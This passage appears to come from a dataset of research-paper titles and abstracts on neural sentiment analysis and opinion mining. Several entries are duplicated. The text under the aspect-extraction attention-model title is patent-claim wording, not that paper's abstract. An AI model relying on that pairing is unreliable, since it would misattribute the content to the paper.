introduce an end-to-end Adversarial Memory Network (AMN) for cross-domain sentiment classification. Unlike existing methods, the proposed AMN can automatically capture the pivots using an attention mechanism. Our framework consists of two parameter-shared memory networks with one for sentiment classification and the other for domain classification. The two networks are jointly trained so that the selected features minimize the sentiment classification error and at the same time make the domain classifier indiscriminative between the representations from the source or target domains. Moreover, unlike deep learning methods that cannot tell which words are the pivots, AMN can offer a direct visualization of them. Experiments on the Amazon review dataset demonstrate that AMN can significantly outperform state-of-the-art methods. --- paper_title: Cached Long Short-Term Memory Neural Networks for Document-Level Sentiment Classification paper_content: Recently, neural networks have achieved great success on sentiment classification due to their ability to alleviate feature engineering. However, one of the remaining challenges is to model long texts in document-level sentiment classification under a recurrent architecture because of the deficiency of the memory unit. To address this problem, we present a Cached Long Short-Term Memory neural networks (CLSTM) to capture the overall semantic information in long texts. CLSTM introduces a cache mechanism, which divides memory into several groups with different forgetting rates and thus enables the network to keep sentiment information better within a recurrent unit. The proposed CLSTM outperforms the state-of-the-art models on three publicly available document-level sentiment analysis datasets. --- paper_title: Hierarchical Attention Networks for Document Classification paper_content: We propose a hierarchical attention network for document classification. Our model has two distinctive characteristics: (i) it has a hierarchical structure that mirrors the hierarchical structure of documents; (ii) it has two levels of attention mechanisms applied at the wordand sentence-level, enabling it to attend differentially to more and less important content when constructing the document representation. Experiments conducted on six large scale text classification tasks demonstrate that the proposed architecture outperform previous methods by a substantial margin. Visualization of the attention layers illustrates that the model selects qualitatively informative words and sentences. --- paper_title: Weakly-supervised deep learning for customer review sentiment classification paper_content: Sentiment analysis is one of the key challenges for mining online user generated content. In this work, we focus on customer reviews which are an important form of opinionated content. The goal is to identify each sentence's semantic orientation (e.g. positive or negative) of a review. Traditional sentiment classification methods often involve substantial human efforts, e.g. lexicon construction, feature engineering. In recent years, deep learning has emerged as an effective means for solving sentiment classification problems. A neural network intrinsically learns a useful representation automatically without human efforts. However, the success of deep learning highly relies on the availability of large-scale training data. In this paper, we propose a novel deep learning framework for review sentiment classification which employs prevalently available ratings as weak supervision signals. The framework consists of two steps: (1) learn a high level representation (embedding space) which captures the general sentiment distribution of sentences through rating information; (2) add a classification layer on top of the embedding layer and use labeled sentences for supervised fine-tuning. Experiments on review data obtained from Amazon show the efficacy of our method and its superiority over baseline methods. --- paper_title: CNN- and LSTM-based Claim Classification in Online User Comments paper_content: When processing arguments in online user interactive discourse, it is often necessary to determine their bases of support. In this paper, we describe a supervised approach, based on deep neural networks, for classifying the claims made in online arguments. We conduct experiments using convolutional neural networks (CNNs) and long short-term memory networks (LSTMs) on two claim data sets compiled from online user comments. Using different types of distributional word embeddings, but without incorporating any rich, expensive set of features, we achieve a significant improvement over the state of the art for one data set (which categorizes arguments as factual vs. emotional), and performance comparable to the state of the art on the other data set (which categorizes claims according to their verifiability). Our approach has the advantages of using a generalized, simple, and effective methodology that works for claim categorization on different data sets and tasks. --- paper_title: Semi-Supervised Recursive Autoencoders for Predicting Sentiment Distributions paper_content: We introduce a novel machine learning framework based on recursive autoencoders for sentence-level prediction of sentiment label distributions. Our method learns vector space representations for multi-word phrases. In sentiment prediction tasks these representations outperform other state-of-the-art approaches on commonly used datasets, such as movie reviews, without using any pre-defined sentiment lexica or polarity shifting rules. We also evaluate the model's ability to predict sentiment distributions on a new dataset based on confessions from the experience project. The dataset consists of personal user stories annotated with multiple labels which, when aggregated, form a multinomial distribution that captures emotional reactions. Our algorithm can more accurately predict distributions over such labels compared to several competitive baselines. --- paper_title: Dimensional Sentiment Analysis Using a Regional CNN-LSTM Model paper_content: Dimensional sentiment analysis aims to recognize continuous numerical values in multiple dimensions such as the valencearousal (VA) space. Compared to the categorical approach that focuses on sentiment classification such as binary classification (i.e., positive and negative), the dimensional approach can provide more fine-grained sentiment analysis. This study proposes a regional CNN-LSTM model consisting of two parts: regional CNN and LSTM to predict the VA ratings of texts. Unlike a conventional CNN which considers a whole text as input, the proposed regional CNN uses an individual sentence as a region, dividing an input text into several regions such that the useful affective information in each region can be extracted and weighted according to their contribution to the VA prediction. Such regional information is sequentially integrated across regions using LSTM for VA prediction. By combining the regional CNN and LSTM, both local (regional) information within sentences and long-distance dependency across sentences can be considered in the prediction process. Experimental results show that the proposed method outperforms lexicon-based, regression-based, and NN-based methods proposed in previous studies. --- paper_title: A Convolutional Neural Network for Modelling Sentences paper_content: The ability to accurately represent sentences is central to language understanding. We describe a convolutional architecture dubbed the Dynamic Convolutional Neural Network (DCNN) that we adopt for the semantic modelling of sentences. The network uses Dynamic k-Max Pooling, a global pooling operation over linear sequences. The network handles input sentences of varying length and induces a feature graph over the sentence that is capable of explicitly capturing short and long-range relations. The network does not rely on a parse tree and is easily applicable to any language. We test the DCNN in four experiments: small scale binary and multi-class sentiment prediction, six-way question classification and Twitter sentiment prediction by distant supervision. The network achieves excellent performance in the first three tasks and a greater than 25% error reduction in the last task with respect to the strongest baseline. --- paper_title: Encoding Syntactic Knowledge in Neural Networks for Sentiment Classification paper_content: Phrase/Sentence representation is one of the most important problems in natural language processing. Many neural network models such as Convolutional Neural Network (CNN), Recursive Neural Network (RNN), and Long Short-Term Memory (LSTM) have been proposed to learn representations of phrase/sentence, however, rich syntactic knowledge has not been fully explored when composing a longer text from its shorter constituent words. In most traditional models, only word embeddings are utilized to compose phrase/sentence representations, while the syntactic information of words is yet to be explored. In this article, we discover that encoding syntactic knowledge (part-of-speech tag) in neural networks can enhance sentence/phrase representation. Specifically, we propose to learn tag-specific composition functions and tag embeddings in recursive neural networks, and propose to utilize POS tags to control the gates of tree-structured LSTM networks. We evaluate these models on two benchmark datasets for sentiment classification, and demonstrate that improvements can be obtained with such syntactic knowledge encoded. --- paper_title: Deep Convolutional Neural Networks for Sentiment Analysis of Short Texts paper_content: Sentiment analysis of short texts such as single sentences and Twitter messages is challenging because of the limited contextual information that they normally contain. Effectively solving this task requires strategies that combine the small text content with prior knowledge and use more than just bag-of-words. In this work we propose a new deep convolutional neural network that exploits from characterto sentence-level information to perform sentiment analysis of short texts. We apply our approach for two corpora of two different domains: the Stanford Sentiment Treebank (SSTb), which contains sentences from movie reviews; and the Stanford Twitter Sentiment corpus (STS), which contains Twitter messages. For the SSTb corpus, our approach achieves state-of-the-art results for single sentence sentiment prediction in both binary positive/negative classification, with 85.7% accuracy, and fine-grained classification, with 48.3% accuracy. For the STS corpus, our approach achieves a sentiment prediction accuracy of 86.4%. --- paper_title: Framewise phoneme classification with bidirectional LSTM and other neural network architectures paper_content: In this paper, we present bidirectional Long Short Term Memory (LSTM) networks, and a modified, full gradient version of the LSTM learning algorithm. We evaluate Bidirectional LSTM (BLSTM) and several other network architectures on the benchmark task of framewise phoneme classification, using the TIMIT database. Our main findings are that bidirectional networks outperform unidirectional ones, and Long Short Term Memory (LSTM) is much faster and also more accurate than both standard Recurrent Neural Nets (RNNs) and time-windowed Multilayer Perceptrons (MLPs). Our results support the view that contextual information is crucial to speech processing, and suggest that BLSTM is an effective architecture with which to exploit it'. --- paper_title: Predicting Polarities of Tweets by Composing Word Embeddings with Long Short-Term Memory paper_content: In this paper, we introduce Long ShortTerm Memory (LSTM) recurrent network for twitter sentiment prediction. With the help of gates and constant error carousels in the memory block structure, the model could handle interactions between words through a flexible compositional function. Experiments on a public noisy labelled data show that our model outperforms several feature-engineering approaches, with the result comparable to the current best data-driven technique. According to the evaluation on a generated negation phrase test set, the proposed architecture doubles the performance of non-neural model based on bag-of-word features. Furthermore, words with special functions (such as negation and transition) are distinguished and the dissimilarities of words with opposite sentiment are magnified. An interesting case study on negation expression processing shows a promising potential of the architecture dealing with complex sentiment phrases. --- paper_title: Learning Tag Embeddings and Tag-specific Composition Functions in Recursive Neural Network paper_content: Recursive neural network is one of the most successful deep learning models for natural language processing due to the compositional nature of text. The model recursively composes the vector of a parent phrase from those of child words or phrases, with a key component named composition function. Although a variety of composition functions have been proposed, the syntactic information has not been fully encoded in the composition process. We propose two models, Tag Guided RNN (TGRNN for short) which chooses a composition function according to the part-ofspeech tag of a phrase, and Tag Embedded RNN/RNTN (TE-RNN/RNTN for short) which learns tag embeddings and then combines tag and word embeddings together. In the fine-grained sentiment classification, experiment results show the proposed models obtain remarkable improvement: TG-RNN/TE-RNN obtain remarkable improvement over baselines, TE-RNTN obtains the second best result among all the top performing models, and all the proposed models have much less parameters/complexity than their counterparts. --- paper_title: Recursive Deep Models for Semantic Compositionality Over a Sentiment Treebank paper_content: Semantic word spaces have been very useful but cannot express the meaning of longer phrases in a principled way. Further progress towards understanding compositionality in tasks such as sentiment detection requires richer supervised training and evaluation resources and more powerful models of composition. To remedy this, we introduce a Sentiment Treebank. It includes fine grained sentiment labels for 215,154 phrases in the parse trees of 11,855 sentences and presents new challenges for sentiment compositionality. To address them, we introduce the Recursive Neural Tensor Network. When trained on the new treebank, this model outperforms all previous methods on several metrics. It pushes the state of the art in single sentence positive/negative classification from 80% up to 85.4%. The accuracy of predicting fine-grained sentiment labels for all phrases reaches 80.7%, an improvement of 9.7% over bag of features baselines. Lastly, it is the only model that can accurately capture the effects of negation and its scope at various tree levels for both positive and negative phrases. --- paper_title: Semantic Compositionality through Recursive Matrix-Vector Spaces paper_content: Single-word vector space models have been very successful at learning lexical information. However, they cannot capture the compositional meaning of longer phrases, preventing them from a deeper understanding of language. We introduce a recursive neural network (RNN) model that learns compositional vector representations for phrases and sentences of arbitrary syntactic type and length. Our model assigns a vector and a matrix to every node in a parse tree: the vector captures the inherent meaning of the constituent, while the matrix captures how it changes the meaning of neighboring words or phrases. This matrix-vector RNN can learn the meaning of operators in propositional logic and natural language. The model obtains state of the art performance on three different experiments: predicting fine-grained sentiment distributions of adverb-adjective pairs; classifying sentiment labels of movie reviews and classifying semantic relationships such as cause-effect or topic-message between nouns using the syntactic path between them. --- paper_title: Adaptive Recursive Neural Network for Target-dependent Twitter Sentiment Classification paper_content: We propose Adaptive Recursive Neural Network (AdaRNN) for target-dependent Twitter sentiment classification. AdaRNN adaptively propagates the sentiments of words to target depending on the context and syntactic relationships between them. It consists of more than one composition functions, and we model the adaptive sentiment propagations as distributions over these composition functions. The experimental studies illustrate that AdaRNN improves the baseline methods. Furthermore, we introduce a manually annotated dataset for target-dependent Twitter sentiment analysis. --- paper_title: Dyadic Memory Networks for Aspect-based Sentiment Analysis paper_content: This paper proposes Dyadic Memory Networks (DyMemNN), a novel extension of end-to-end memory networks (memNN) for aspect-based sentiment analysis (ABSA). Originally designed for question answering tasks, memNN operates via a memory selection operation in which relevant memory pieces are adaptively selected based on the input query. In the problem of ABSA, this is analogous to aspects and documents in which the relationship between each word in the document is compared with the aspect vector. In the standard memory networks, simple dot products or feed forward neural networks are used to model the relationship between aspect and words which lacks representation learning capability. As such, our dyadic memory networks ameliorates this weakness by enabling rich dyadic interactions between aspect and word embeddings by integrating either parameterized neural tensor compositions or holographic compositions into the memory selection operation. To this end, we propose two variations of our dyadic memory networks, namely the Tensor DyMemNN and Holo DyMemNN. Overall, our two models are end-to-end neural architectures that enable rich dyadic interaction between aspect and document which intuitively leads to better performance. Via extensive experiments, we show that our proposed models achieve the state-of-the-art performance and outperform many neural architectures across six benchmark datasets. --- paper_title: Adaptive Recursive Neural Network for Target-dependent Twitter Sentiment Classification paper_content: We propose Adaptive Recursive Neural Network (AdaRNN) for target-dependent Twitter sentiment classification. AdaRNN adaptively propagates the sentiments of words to target depending on the context and syntactic relationships between them. It consists of more than one composition functions, and we model the adaptive sentiment propagations as distributions over these composition functions. The experimental studies illustrate that AdaRNN improves the baseline methods. Furthermore, we introduce a manually annotated dataset for target-dependent Twitter sentiment analysis. --- paper_title: Interactive Attention Networks for Aspect-Level Sentiment Classification paper_content: Aspect-level sentiment classification aims at identifying the sentiment polarity of specific target in its context. Previous approaches have realized the importance of targets in sentiment classification and developed various methods with the goal of precisely modeling their contexts via generating target-specific representations. However, these studies always ignore the separate modeling of targets. In this paper, we argue that both targets and contexts deserve special treatment and need to be learned their own representations via interactive learning. Then, we propose the interactive attention networks (IAN) to interactively learn attentions in the contexts and targets, and generate the representations for targets and contexts separately. With this design, the IAN model can well represent a target and its collocative context, which is helpful to sentiment classification. Experimental results on SemEval 2014 Datasets demonstrate the effectiveness of our model. --- paper_title: Effective LSTMs for Target-Dependent Sentiment Classification paper_content: Target-dependent sentiment classification remains a challenge: modeling the semantic relatedness of a target with its context words in a sentence. Different context words have different influences on determining the sentiment polarity of a sentence towards the target. Therefore, it is desirable to integrate the connections between target word and context words when building a learning system. In this paper, we develop two target dependent long short-term memory (LSTM) models, where target information is automatically taken into account. We evaluate our methods on a benchmark dataset from Twitter. Empirical results show that modeling sentence representation with standard LSTM does not perform well. Incorporating target information into LSTM can significantly boost the classification accuracy. The target-dependent LSTM models achieve state-of-the-art performances without using syntactic parser or external sentiment lexicons. --- paper_title: Deep Memory Networks for Attitude Identification paper_content: We consider the task of identifying attitudes towards a given set of entities from text. Conventionally, this task is decomposed into two separate subtasks: target detection that identifies whether each entity is mentioned in the text, either explicitly or implicitly, and polarity classification that classifies the exact sentiment towards an identified entity (the target) into positive, negative, or neutral. Instead, we show that attitude identification can be solved with an end-to-end machine learning architecture, in which the two subtasks are interleaved by a deep memory network. In this way, signals produced in target detection provide clues for polarity classification, and reversely, the predicted polarity provides feedback to the identification of targets. Moreover, the treatments for the set of targets also influence each other -- the learned representations may share the same semantics for some targets but vary for others. The proposed deep memory network, the AttNet, outperforms methods that do not consider the interactions between the subtasks or those among the targets, including conventional machine learning methods and the state-of-the-art deep learning models. --- paper_title: Gated neural networks for targeted sentiment analysis paper_content: Targeted sentiment analysis classifies the sentiment polarity towards each target entity mention in given text documents. Seminal methods extract manual discrete features from automatic syntactic parse trees in order to capture semantic information of the enclosing sentence with respect to a target entity mention. Recently, it has been shown that competitive accuracies can be achieved without using syntactic parsers, which can be highly inaccurate on noisy text such as tweets. This is achieved by applying distributed word representations and rich neural pooling functions over a simple and intuitive segmentation of tweets according to target entity mentions. In this paper, we extend this idea by proposing a sentence-level neural model to address the limitation of pooling functions, which do not explicitly model tweet-level semantics. First, a bi-directional gated neural network is used to connect the words in a tweet so that pooling functions can be applied over the hidden layer instead of words for better representing the target and its contexts. Second, a three-way gated neural network structure is used to model the interaction between the target mention and its surrounding contexts. Experiments show that our proposed model gives significantly higher accuracies compared to the current best method for targeted sentiment analysis. --- paper_title: Aspect Level Sentiment Classification with Deep Memory Network paper_content: We introduce a deep memory network for aspect level sentiment classification. Unlike feature-based SVM and sequential neural models such as LSTM, this approach explicitly captures the importance of each context word when inferring the sentiment polarity of an aspect. Such importance degree and text representation are calculated with multiple computational layers, each of which is a neural attention model over an external memory. Experiments on laptop and restaurant datasets demonstrate that our approach performs comparable to state-of-art feature based SVM system, and substantially better than LSTM and attention-based LSTM architectures. On both datasets we show that multiple computational layers could improve the performance. Moreover, our approach is also fast. The deep memory network with 9 layers is 15 times faster than LSTM with a CPU implementation. --- paper_title: A Hierarchical Model of Reviews for Aspect-based Sentiment Analysis paper_content: Opinion mining from customer reviews has become pervasive in recent years. Sentences in reviews, however, are usually classified independently, even though they form part of a review's argumentative structure. Intuitively, sentences in a review build and elaborate upon each other; knowledge of the review structure and sentential context should thus inform the classification of each sentence. We demonstrate this hypothesis for the task of aspect-based sentiment analysis by modeling the interdependencies of sentences in a review with a hierarchical bidirectional LSTM. We show that the hierarchical model outperforms two non-hierarchical baselines, obtains results competitive with the state-of-the-art, and outperforms the state-of-the-art on five multilingual, multi-domain datasets without any hand-engineered features or external resources. --- paper_title: Rationalizing Neural Predictions paper_content: Prediction without justification has limited applicability. As a remedy, we learn to extract pieces of input text as justifications -- rationales -- that are tailored to be short and coherent, yet sufficient for making the same prediction. Our approach combines two modular components, generator and encoder, which are trained to operate well together. The generator specifies a distribution over text fragments as candidate rationales and these are passed through the encoder for prediction. Rationales are never given during training. Instead, the model is regularized by desiderata for rationales. We evaluate the approach on multi-aspect sentiment analysis against manually annotated test cases. Our approach outperforms attention-based baseline by a significant margin. We also successfully illustrate the method on the question retrieval task. --- paper_title: Target-dependent twitter sentiment classification with rich automatic features paper_content: Target-dependent sentiment analysis on Twitter has attracted increasing research attention. Most previous work relies on syntax, such as automatic parse trees, which are subject to noise for informal text such as tweets. In this paper, we show that competitive results can be achieved without the use of syntax, by extracting a rich set of automatic features. In particular, we split a tweet into a left context and a right context according to a given target, using distributed word representations and neural pooling functions to extract features. Both sentiment-driven and standard embeddings are used, and a rich set of neural pooling functions are explored. Sentiment lexicons are used as an additional source of information for feature extraction. In standard evaluation, the conceptually simple method gives a 4.8% absolute improvement over the state-of-the-art on three-way targeted sentiment classification, achieving the best reported results for this task. --- paper_title: Neural Networks for Open Domain Targeted Sentiment paper_content: Open domain targeted sentiment is the joint information extraction task that finds target mentions together with the sentiment towards each mention from a text corpus. The task is typically modeled as a sequence labeling problem, and solved using state-of-the-art labelers such as CRF. We empirically study the effect of word embeddings and automatic feature combinations on the task by extending a CRF baseline using neural networks, which have demonstrated large potentials for sentiment analysis. Results show that the neural model can give better results by significantly increasing the recall. In addition, we propose a novel integration of neural and discrete features, which combines their relative advantages, leading to significantly higher results compared to both baselines. --- paper_title: Representation learning for aspect category detection in online reviews paper_content: User-generated reviews are valuable resources for decision making. Identifying the aspect categories discussed in a given review sentence (e.g., "food" and "service" in restaurant reviews) is an important task of sentiment analysis and opinion mining. Given a predefined aspect category set, most previous researches leverage handcrafted features and a classification algorithm to accomplish the task. The crucial step to achieve better performance is feature engineering which consumes much human effort and may be unstable when the product domain changes. In this paper, we propose a representation learning approach to automatically learn useful features for aspect category detection. Specifically, a semi-supervised word embedding algorithm is first proposed to obtain continuous word representations on a large set of reviews with noisy labels. Afterwards, we propose to generate deeper and hybrid features through neural networks stacked on the word vectors. A logistic regression classifier is finally trained with the hybrid features to predict the aspect category. The experiments are carried out on a benchmark dataset released by SemEval-2014. Our approach achieves the state-of-the-art performance and outperforms the best participating team as well as a few strong baselines. --- paper_title: Recursive Neural Conditional Random Fields for Aspect-based Sentiment Analysis paper_content: In aspect-based sentiment analysis, extracting aspect terms along with the opinions being expressed from user-generated content is one of the most important subtasks. Previous studies have shown that exploiting connections between aspect and opinion terms is promising for this task. In this paper, we propose a novel joint model that integrates recursive neural networks and conditional random fields into a unified framework for explicit aspect and opinion terms co-extraction. The proposed model learns high-level discriminative features and double propagate information between aspect and opinion terms, simultaneously. Moreover, it is flexible to incorporate hand-crafted features into the proposed model to further boost its information extraction performance. Experimental results on the SemEval Challenge 2014 dataset show the superiority of our proposed model over several baseline methods as well as the winning systems of the challenge. --- paper_title: An Unsupervised Neural Attention Model for Aspect Extraction paper_content: Methods, systems, and computer-readable storage media for receiving a vocabulary, the vocabulary including text data that is provided as at least a portion of raw data, the raw data being provided in a computer-readable file, associating each word in the vocabulary with a feature vector, providing a sentence embedding for each sentence of the vocabulary based on a plurality of feature vectors to provide a plurality of sentence embeddings, providing a reconstructed sentence embedding for each sentence embedding based on a weighted parameter matrix to provide a plurality of reconstructed sentence embeddings, and training the unsupervised neural attention model based on the sentence embeddings and the reconstructed sentence embeddings to provide a trained neural attention model, the trained neural attention model being used to automatically determine aspects from the vocabulary. --- paper_title: Aspect extraction for opinion mining with a deep convolutional neural network paper_content: In this paper, we present the first deep learning approach to aspect extraction in opinion mining. Aspect extraction is a subtask of sentiment analysis that consists in identifying opinion targets in opinionated text, i.e., in detecting the specific aspects of a product or service the opinion holder is either praising or complaining about. We used a 7-layer deep convolutional neural network to tag each word in opinionated sentences as either aspect or non-aspect word. We also developed a set of linguistic patterns for the same purpose and combined them with the neural network. The resulting ensemble classifier, coupled with a word-embedding model for sentiment analysis, allowed our approach to obtain significantly better accuracy than state-of-the-art methods. --- paper_title: Unsupervised Word and Dependency Path Embeddings for Aspect Term Extraction paper_content: In this paper, we develop a novel approach to aspect term extraction based on unsupervised learning of distributed representations of words and dependency paths. The basic idea is to connect two words (w1 and w2) with the dependency path (r) between them in the embedding space. Specifically, our method optimizes the objective w1 + r = w2 in the low-dimensional space, where the multi-hop dependency paths are treated as a sequence of grammatical relations and modeled by a recurrent neural network. Then, we design the embedding features that consider linear context and dependency context information, for the conditional random field (CRF) based aspect term extraction. Experimental results on the SemEval datasets show that, (1) with only embedding features, we can achieve state-of-the-art results; (2) our embedding method which incorporates the syntactic information among words yields better performance than other representative ones in aspect term extraction. --- paper_title: Distance Metric Learning for Aspect Phrase Grouping paper_content: Aspect phrase grouping is an important task in aspect-level sentiment analysis. It is a challenging problem due to polysemy and context dependency. We propose an Attention-based Deep Distance Metric Learning (ADDML) method, by considering aspect phrase representation as well as context representation. First, leveraging the characteristics of the review text, we automatically generate aspect phrase sample pairs for distant supervision. Second, we feed word embeddings of aspect phrases and their contexts into an attention-based neural network to learn feature representation of contexts. Both aspect phrase embedding and context embedding are used to learn a deep feature subspace for measure the distances between aspect phrases for K-means clustering. Experiments on four review datasets show that the proposed method outperforms state-of-the-art strong baseline methods. --- paper_title: Fine-grained Opinion Mining with Recurrent Neural Networks and Word Embeddings paper_content: The tasks in fine-grained opinion mining can be regarded as either a token-level sequence labeling problem or as a semantic compositional task. We propose a general class of discriminative models based on recurrent neural networks (RNNs) and word embeddings that can be successfully applied to such tasks without any taskspecific feature engineering effort. Our experimental results on the task of opinion target identification show that RNNs, without using any hand-crafted features, outperform feature-rich CRF-based models. Our framework is flexible, allows us to incorporate other linguistic features, and achieves results that rival the top performing systems in SemEval-2014. --- paper_title: Recursive Neural Conditional Random Fields for Aspect-based Sentiment Analysis paper_content: In aspect-based sentiment analysis, extracting aspect terms along with the opinions being expressed from user-generated content is one of the most important subtasks. Previous studies have shown that exploiting connections between aspect and opinion terms is promising for this task. In this paper, we propose a novel joint model that integrates recursive neural networks and conditional random fields into a unified framework for explicit aspect and opinion terms co-extraction. The proposed model learns high-level discriminative features and double propagate information between aspect and opinion terms, simultaneously. Moreover, it is flexible to incorporate hand-crafted features into the proposed model to further boost its information extraction performance. Experimental results on the SemEval Challenge 2014 dataset show the superiority of our proposed model over several baseline methods as well as the winning systems of the challenge. --- paper_title: Extracting Opinion Expressions with semi-Markov Conditional Random Fields paper_content: Extracting opinion expressions from text is usually formulated as a token-level sequence labeling task tackled using Conditional Random Fields (CRFs). CRFs, however, do not readily model potentially useful segment-level information like syntactic constituent structure. Thus, we propose a semi-CRF-based approach to the task that can perform sequence labeling at the segment level. We extend the original semi-CRF model (Sarawagi and Cohen, 2004) to allow the modeling of arbitrarily long expressions while accounting for their likely syntactic structure when modeling segment boundaries. We evaluate performance on two opinion extraction tasks, and, in contrast to previous sequence labeling approaches to the task, explore the usefulness of segmentlevel syntactic parse features. Experimental results demonstrate that our approach outperforms state-of-the-art methods for both opinion expression tasks. --- paper_title: Deep Recursive Neural Networks for Compositionality in Language paper_content: Recursive neural networks comprise a class of architecture that can operate on structured input. They have been previously successfully applied to model com-positionality in natural language using parse-tree-based structural representations. Even though these architectures are deep in structure, they lack the capacity for hierarchical representation that exists in conventional deep feed-forward networks as well as in recently investigated deep recurrent neural networks. In this work we introduce a new architecture — a deep recursive neural network (deep RNN) — constructed by stacking multiple recursive layers. We evaluate the proposed model on the task of fine-grained sentiment classification. Our results show that deep RNNs outperform associated shallow counterparts that employ the same number of parameters. Furthermore, our approach outperforms previous baselines on the sentiment analysis task, including a multiplicative RNN variant as well as the recently introduced paragraph vectors, achieving new state-of-the-art results. We provide exploratory analyses of the effect of multiple layers and show that they capture different aspects of compositionality in language. --- paper_title: Neural Networks for Integrating Compositional and Non-compositional Sentiment in Sentiment Composition paper_content: This paper proposes neural networks for integrating compositional and non-compositional sentiment in the process of sentiment composition, a type of semantic composition that optimizes a sentiment objective. We enable individual composition operations in a recursive process to possess the capability of choosing and merging information from these two types of sources. We propose our models in neural network frameworks with structures, in which the merging parameters can be learned in a principled way to optimize a well-defined objective. We conduct experiments on the Stanford Sentiment Treebank and show that the proposed models achieve better results over the model that lacks this ability. --- paper_title: Recursive Deep Models for Semantic Compositionality Over a Sentiment Treebank paper_content: Semantic word spaces have been very useful but cannot express the meaning of longer phrases in a principled way. Further progress towards understanding compositionality in tasks such as sentiment detection requires richer supervised training and evaluation resources and more powerful models of composition. To remedy this, we introduce a Sentiment Treebank. It includes fine grained sentiment labels for 215,154 phrases in the parse trees of 11,855 sentences and presents new challenges for sentiment compositionality. To address them, we introduce the Recursive Neural Tensor Network. When trained on the new treebank, this model outperforms all previous methods on several metrics. It pushes the state of the art in single sentence positive/negative classification from 80% up to 85.4%. The accuracy of predicting fine-grained sentiment labels for all phrases reaches 80.7%, an improvement of 9.7% over bag of features baselines. Lastly, it is the only model that can accurately capture the effects of negation and its scope at various tree levels for both positive and negative phrases. --- paper_title: Recognizing opinion sources based on a new categorization of opinion types paper_content: Recognizing sources of opinions is an important task in sentiment analysis. Different from previous works which categorize an opinion according to whether the source is the writer or the source is a noun phrase, we propose a new categorization of opinions according to the role that the source plays. The source of a participant opinion is a participant in the event that triggers the opinion. On the contrary, the source of a non-participant opinion is not a participant. Based on this new categorization, we classify an opinion using phrase-level embeddings. A transductive learning method is used for the classifier since there is no existing annotated corpora of this new categorization. A joint prediction model of Probabilistic Soft Logic then recognizes the sources of the two types of opinions in a single model. The experiments have shown that our model improves recognizing sources of opinions over baselines and several state-of-the-art works. --- paper_title: Joint Inference for Fine-grained Opinion Extraction paper_content: This paper addresses the task of finegrained opinion extraction ‐ the identification of opinion-related entities: the opinion expressions, the opinion holders, and the targets of the opinions, and the relations between opinion expressions and their targets and holders. Most existing approaches tackle the extraction of opinion entities and opinion relations in a pipelined manner, where the interdependencies among different extraction stages are not captured. We propose a joint inference model that leverages knowledge from predictors that optimize subtasks of opinion extraction, and seeks a globally optimal solution. Experimental results demonstrate that our joint inference approach significantly outperforms traditional pipeline methods and baselines that tackle subtasks in isolation for the problem of opinion extraction. --- paper_title: Neural Networks for Open Domain Targeted Sentiment paper_content: Open domain targeted sentiment is the joint information extraction task that finds target mentions together with the sentiment towards each mention from a text corpus. The task is typically modeled as a sequence labeling problem, and solved using state-of-the-art labelers such as CRF. We empirically study the effect of word embeddings and automatic feature combinations on the task by extending a CRF baseline using neural networks, which have demonstrated large potentials for sentiment analysis. Results show that the neural model can give better results by significantly increasing the recall. In addition, we propose a novel integration of neural and discrete features, which combines their relative advantages, leading to significantly higher results compared to both baselines. --- paper_title: Weakly-supervised deep learning for customer review sentiment classification paper_content: Sentiment analysis is one of the key challenges for mining online user generated content. In this work, we focus on customer reviews which are an important form of opinionated content. The goal is to identify each sentence's semantic orientation (e.g. positive or negative) of a review. Traditional sentiment classification methods often involve substantial human efforts, e.g. lexicon construction, feature engineering. In recent years, deep learning has emerged as an effective means for solving sentiment classification problems. A neural network intrinsically learns a useful representation automatically without human efforts. However, the success of deep learning highly relies on the availability of large-scale training data. In this paper, we propose a novel deep learning framework for review sentiment classification which employs prevalently available ratings as weak supervision signals. The framework consists of two steps: (1) learn a high level representation (embedding space) which captures the general sentiment distribution of sentences through rating information; (2) add a classification layer on top of the embedding layer and use labeled sentences for supervised fine-tuning. Experiments on review data obtained from Amazon show the efficacy of our method and its superiority over baseline methods. --- paper_title: Fine-grained Opinion Mining with Recurrent Neural Networks and Word Embeddings paper_content: The tasks in fine-grained opinion mining can be regarded as either a token-level sequence labeling problem or as a semantic compositional task. We propose a general class of discriminative models based on recurrent neural networks (RNNs) and word embeddings that can be successfully applied to such tasks without any taskspecific feature engineering effort. Our experimental results on the task of opinion target identification show that RNNs, without using any hand-crafted features, outperform feature-rich CRF-based models. Our framework is flexible, allows us to incorporate other linguistic features, and achieves results that rival the top performing systems in SemEval-2014. --- paper_title: Distributed Representations of Sentences and Documents paper_content: Many machine learning algorithms require the input to be represented as a fixed-length feature vector. When it comes to texts, one of the most common fixed-length features is bag-of-words. Despite their popularity, bag-of-words features have two major weaknesses: they lose the ordering of the words and they also ignore semantics of the words. For example, "powerful," "strong" and "Paris" are equally distant. In this paper, we propose Paragraph Vector, an unsupervised algorithm that learns fixed-length feature representations from variable-length pieces of texts, such as sentences, paragraphs, and documents. Our algorithm represents each document by a dense vector which is trained to predict words in the document. Its construction gives our algorithm the potential to overcome the weaknesses of bag-of-words models. Empirical results show that Paragraph Vectors outperforms bag-of-words models as well as other techniques for text representations. Finally, we achieve new state-of-the-art results on several text classification and sentiment analysis tasks. --- paper_title: Collaborative multi-level embedding learning from reviews for rating prediction paper_content: We investigate the problem of personalized review-based rating prediction which aims at predicting users' ratings for items that they have not evaluated by using their historical reviews and ratings. Most of existing methods solve this problem by integrating topic model and latent factor model to learn interpretable user and items factors. However, these methods cannot utilize word local context information of reviews. Moreover, it simply restricts user and item representations equivalent to their review representations, which may bring some irrelevant information in review text and harm the accuracy of rating prediction. ::: ::: In this paper, we propose a novel Collaborative Multi-Level Embedding (CMLE) model to address these limitations. The main technical contribution of CMLE is to integrate word embedding model with standard matrix factorization model through a projection level. This allows CMLE to inherit the ability of capturing word local context information from word embedding model and relax the strict equivalence requirement by projecting review embedding to user and item embeddings. A joint optimization problem is formulated and solved through an efficient stochastic gradient ascent algorithm. Empirical evaluations on real datasets show CMLE outperforms several competitive methods and can solve the two limitations well. --- paper_title: Do Multi-Sense Embeddings Improve Natural Language Understanding? paper_content: Learning a distinct representation for each sense of an ambiguous word could lead to more powerful and fine-grained models of vector-space representations. Yet while ‘multi-sense’ methods have been proposed and tested on artificial wordsimilarity tasks, we don’t know if they improve real natural language understanding tasks. In this paper we introduce a multisense embedding model based on Chinese Restaurant Processes that achieves state of the art performance on matching human word similarity judgments, and propose a pipelined architecture for incorporating multi-sense embeddings into language understanding. We then test the performance of our model on part-of-speech tagging, named entity recognition, sentiment analysis, semantic relation identification and semantic relatedness, controlling for embedding dimensionality. We find that multi-sense embeddings do improve performance on some tasks (part-of-speech 